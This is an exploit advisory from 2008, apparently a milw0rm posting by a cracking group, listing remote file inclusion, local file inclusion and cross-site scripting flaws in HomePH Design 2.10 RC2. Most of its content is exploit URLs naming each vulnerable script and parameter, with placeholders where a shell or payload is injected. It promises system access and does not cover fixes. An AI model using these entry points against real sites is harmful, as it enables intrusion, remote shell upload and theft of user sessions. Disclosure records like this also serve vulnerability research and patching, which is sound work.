HomePH Design 2.10 RC2 (RFI/LFI/XSS) Multiple Vulnerabilities

┌┌───────────────────────────────────────────────────────────────────────────┐
││                             C r a C k E r                                ┌┘
┌┘          T H E   C R A C K   O F   E T E R N A L   M I G H T             ││
└───────────────────────────────────────────────────────────────────────────┘┘

 ┌────      From The Ashes and Dust Rises An Unimaginable crack....      ────┐
┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘       [ Remote File Include ]   [ Local File Include ]   [XSS]           ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
:   Author   : CraCkEr                : :                                    :
│   Group    : uNiTeD CraCkiNg ForCE  │ │                                    │
│   Script   : HomePH Design 2.10 RC2 │ │         Register Globals :         │
│   Download : SourceForge.net        │ │                                    │
│   Method   : GET                    │ │          [█] ON   [ ] OFF          │
│   Critical : High [░░▒▒▓▓██]        │ │                                    │
│   Impact   : System access          │ │                                    │
│ ────────────────────────────────────┘ └─────────────────────────────────── │
│                              DALnet #crackers                             ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
:                                                                            :
│  Release Notes:                                                            │
│  ═════════════                                                             │
│  Typically used for remotely exploitable vulnerabilities that can lead to  │
│  system compromise.                                                        │
│                                                                            │

┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘                             Exploit URL's                                ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
  

[RFI]

http://localhost/path/admin/templates/template_thumbnail.php?thumb_template=[SHELL]

[LFI]

http://localhost/path/admin/templates/template_thumbnail.php?thumb_template=[LFI]
http://localhost/path/admin/features/account/account.php?language=[LFI]
http://localhost/path/admin/features/downloads/downloads.php?language=[LFI]
http://localhost/path/admin/features/forum/forum.php?language=[LFI]
http://localhost/path/admin/features/fotogalerie/delete.php?language=[LFI]
http://localhost/path/admin/features/fotogalerie/fotogalerie.php?language=[LFI]

[XSS]

http://localhost/path/admin/features/register/register.php?error_meldung=[XSS]
http://localhost/path/admin/features/memberlist/memberlist.php?feature_language[ueberschrift]=[XSS]
http://localhost/path/admin/features/lostpassword/lostpassword.php?language_array[ueberschrift]=[XSS]
http://localhost/path/admin/features/kalender/eingabe.php?language_feature[titel]=[XSS]
http://localhost/path/admin/features/fotogalerie/eingabe.php?language_feature[bildmenu]=[XSS]

   Notes: More files are infected.
   ═════

└────────────────────────────────────────────────────────────────────────────┘
 
Greets:
       The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS

┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘                              © CraCkEr 2008                              ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘

# milw0rm.com [2008-06-22]